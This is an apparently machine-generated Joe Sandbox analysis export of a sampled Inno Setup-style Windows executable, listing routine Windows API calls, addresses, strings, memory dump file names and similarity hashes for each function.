• Opcode ID: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
• Instruction ID: 65fff70db6fa7d9e45c4e30736062023b7b7828f3df3317cc7ecb80ce87614ba
• Opcode Fuzzy Hash: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
• Instruction Fuzzy Hash: 7841A330A04209DBCB11DB6AC8013AE76A55F49306F55857FAC0197393DB7C8E0D876E
APIs
• GetCapture.USER32 ref: 00422EB4
• GetCapture.USER32 ref: 00422EC3
• SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
• ReleaseCapture.USER32 ref: 00422ECE
• GetActiveWindow.USER32 ref: 00422EDD
• SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
• SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
• GetActiveWindow.USER32 ref: 00422FCF
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: CaptureMessageSend$ActiveWindow$Release
• String ID:
• API String ID: 862346643-0
• Opcode ID: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
• Instruction ID: db8aa600a50c93bece591f99e5806f4c3f5e9428d1b568cd9ed9aa9c7d903083
• Opcode Fuzzy Hash: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
• Instruction Fuzzy Hash: 0A413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF540AB392DB789E40DB5D
APIs
• GetWindowLongA.USER32(?,000000F0), ref: 0042F12E
• GetWindowLongA.USER32(?,000000EC), ref: 0042F145
• GetActiveWindow.USER32 ref: 0042F14E
• MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
• SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Window$ActiveLong$Message
• String ID:
• API String ID: 2785966331-0
• Opcode ID: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
• Instruction ID: 66ba457b2775015b13cc3341b2fd0efd1cc0de66d5492798f2afbbc1fd9aa33e
• Instruction Fuzzy Hash: 7B31B474A00654EFDB01EFB6DC52D6EBBB8EB09714F9144BAF804E3291D6399D10CB68
APIs
• 73A0A570.USER32(00000000), ref: 0042949A
• GetTextMetricsA.GDI32(00000000), ref: 004294A3
  • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
• SelectObject.GDI32(00000000,00000000), ref: 004294B2
• GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
• SelectObject.GDI32(00000000,00000000), ref: 004294C6
• 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
• GetSystemMetrics.USER32(00000006), ref: 004294F3
• GetSystemMetrics.USER32(00000006), ref: 0042950D
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
• String ID:
• API String ID: 361401722-0
• Opcode ID: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
• Instruction ID: 4657f5dde1e086c017b18360b1712f1689f4efb7679c0f09225e2053bbf18421
• Instruction Fuzzy Hash: F701E1917087513BFB11B67A9CC2F6B61D8CB84358F44043FFA459A3D2D96C9C80866A
APIs
• 73A0A570.USER32(00000000,?,00419069,004970A2), ref: 0041DE37
• 73A14620.GDI32(00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE41
• 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE4E
• MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
• GetStockObject.GDI32(00000007), ref: 0041DE6B
• GetStockObject.GDI32(00000005), ref: 0041DE77
• GetStockObject.GDI32(0000000D), ref: 0041DE83
• LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: ObjectStock$A14620A480A570IconLoad
• String ID:
• API String ID: 2920975243-0
• Opcode ID: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
• Instruction ID: b4cf756beaef1adc4f5fbcf44fabff1cc3cb88bfcb9329de381bdc5a6adb432b
• Instruction Fuzzy Hash: 88113DB06443015EE740FF665896BAA3690DB24708F04813FF645AF2D2DB7D1CA49BAE
APIs
• LoadCursorA.USER32(00000000,00007F02), ref: 00462A6C
• SetCursor.USER32(00000000,00000000,00007F02,00000000,00462B01), ref: 00462A72
• SetCursor.USER32(?,00462AE9,00007F02,00000000,00462B01), ref: 00462ADC
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Cursor$Load
• String ID: $ $Internal error: Item already expanding
• API String ID: 1675784387-1948079669
• Opcode ID: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
• Instruction ID: 09c47418b275a9072aadbefc454c559749aab815838d7f365e24efc4a4a37fb5
• Instruction Fuzzy Hash: 0DB1A530600A04EFD720DF69D685B9ABBF1FF44304F1484AAE8459B7A2D7B8ED45CB19
APIs
• GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00475755
• 73A159E0.USER32(00000000,000000FC,004756B0,00000000,00475994,?,00000000,004759BE), ref: 0047577C
• GetACP.KERNEL32(00000000,00475994,?,00000000,004759BE), ref: 004757B9
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004757FF
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: A159ClassInfoMessageSend
• String ID: COMBOBOX$Inno Setup: Language
• API String ID: 3375322265-4234151509
• Opcode ID: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
• Instruction ID: 765adbbab907e06bc7bf6e6f7cf1d32fb8b56d6e7c29df1de031be62d4a3d325
• Instruction Fuzzy Hash: F7815E70A00605DFC710EF69D885A9EB7F5FB09314F1581BAE808EB362D774AD41CB99
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
  • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
  • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: InfoLocale$DefaultSystem
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• API String ID: 1044490935-665933166
• Opcode ID: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
• Instruction ID: 5b8a50df068a6b2da3a3ead13541c1976fd8fe610af15afaced6bb711b513b54
• Instruction Fuzzy Hash: 35513024B00108ABD701FBA69D41A9E77A9DB94304F50C07FA441BB3C6DE3DDE15875E
APIs
• GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
• InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
  • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
• InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
  • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
• InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
Strings
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Menu$Insert$Create$ItemPopupVersion
• String ID: ,$?
• API String ID: 2359071979-2308483597
• Opcode ID: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
• Instruction ID: bc3149483dfa03cdc0807f0a56c3f90cc05caec19bb46b1e0c32919a2f580dbf
• Instruction Fuzzy Hash: 95512674A00144ABDB00EF6ADC816EA7BF9AF09304B11817BFA04E73A6D738C941CB5C
APIs
• GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
• GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
• GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
• GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
• DeleteObject.GDI32(?), ref: 0041BFAF
• DeleteObject.GDI32(?), ref: 0041BFB8
• CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
Memory Dump Source
• Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
Similarity
• API ID: Object$BitmapBitsDelete$CreateIcon
• String ID:
• API String ID: 1030595962-0
• Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
• Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
• Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                                            APIs
                                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                                            • 73A14620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                                            • 73A08830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                                            • 73A022A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                                            • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                                            • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                                            • 73A08830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Stretch$A08830$A022A14620BitsMode
                                                                                            • String ID:
                                                                                            • API String ID: 2733548868-0
                                                                                            • Opcode ID: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                                            • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                                            • Opcode Fuzzy Hash: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                                            • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,?,?), ref: 00456526
                                                                                              • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                              • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                              • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045658D
                                                                                            • TranslateMessage.USER32(?), ref: 004565AB
                                                                                            • DispatchMessageA.USER32(?), ref: 004565B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$TextWindow$A15940CurrentDispatchSendThreadTranslate
                                                                                            • String ID: [Paused]
                                                                                            • API String ID: 1715372110-4230553315
                                                                                            • Opcode ID: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                                            • Instruction ID: b21e1f9e90a9f2d36a55999f4aec8319d50e535270b7c0faa20aeab8e88a7384
                                                                                            • Opcode Fuzzy Hash: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                                            • Instruction Fuzzy Hash: 9B310B70904248AEDB01DBB5DC41BCE7BB8EB0D314F95407BF800E3296D67C9909CBA9
                                                                                            APIs
                                                                                            • GetCursor.USER32(00000000,0046A767), ref: 0046A6E4
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0046A6F2
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A767), ref: 0046A6F8
                                                                                            • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A702
                                                                                            • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A708
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$LoadSleep
                                                                                            • String ID: CheckPassword
                                                                                            • API String ID: 4023313301-1302249611
                                                                                            • Opcode ID: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                                            • Instruction ID: 8e453c91c0c590c9759b614a584e43fa839bbbc5a3d1c7197c153ffb71e3d1f4
                                                                                            • Opcode Fuzzy Hash: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                                            • Instruction Fuzzy Hash: 36319334640604AFD711EB69C989F9E7BE0EF05305F5580B6F844AB3A2D778EE00CB5A
                                                                                            APIs
                                                                                              • Part of subcall function 0047663C: GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                                              • Part of subcall function 0047663C: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                                              • Part of subcall function 0047663C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                                            • SendMessageA.USER32(00000000,0000004A,00000000,00476ACE), ref: 00476749
                                                                                            • GetTickCount.KERNEL32 ref: 0047678E
                                                                                            • GetTickCount.KERNEL32 ref: 00476798
                                                                                            • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004767ED
                                                                                            Strings
                                                                                            • CallSpawnServer: Unexpected response: $%x, xrefs: 0047677E
                                                                                            • CallSpawnServer: Unexpected status: %d, xrefs: 004767D6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                            • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                            • API String ID: 613034392-3771334282
                                                                                            • Opcode ID: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                                            • Instruction ID: 71a83a78c23d55d33e7515897efa00ecebce1ccd6bd4cc0fbedfc923aec738ff
                                                                                            • Opcode Fuzzy Hash: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                                            • Instruction Fuzzy Hash: 7831C074F006149ADB10EBB9C8827EEB3E29F04304F91843BB548EB382D67C8D018B9D
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00458F5F
                                                                                            Strings
                                                                                            • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00458F6A
                                                                                            • .NET Framework CreateAssemblyCache function failed, xrefs: 00458F82
                                                                                            • CreateAssemblyCache, xrefs: 00458F56
                                                                                            • Failed to load .NET Framework DLL "%s", xrefs: 00458F44
                                                                                            • Fusion.dll, xrefs: 00458EFF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                            • API String ID: 190572456-3990135632
                                                                                            • Opcode ID: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                                            • Instruction ID: b0fae5d47ad60a87b9f111cdb81e12311f6487f55351a3ce1c195c50c1487ae5
                                                                                            • Opcode Fuzzy Hash: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                                            • Instruction Fuzzy Hash: 31317971E00605ABCB00DFA5C88169EB7B5AF48315F50857FE814F7382DF7899098799
                                                                                            APIs
                                                                                              • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                                            • GetFocus.USER32 ref: 0041C178
                                                                                            • 73A0A570.USER32(?), ref: 0041C184
                                                                                            • 73A08830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                                            • 73A022A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                                            • 73A08830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                                            • 73A0A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A08830$A022A480A570BitsFocusObject
                                                                                            • String ID:
                                                                                            • API String ID: 1424713005-0
                                                                                            • Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                                            • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                                            • Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                                            • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                                            • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                                            • 6F522980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                                              • Part of subcall function 004099C0: 6F51C400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                                            • 6F58CB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                                            • 6F58C740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                                            • 6F58CB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                                            • 6F520860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
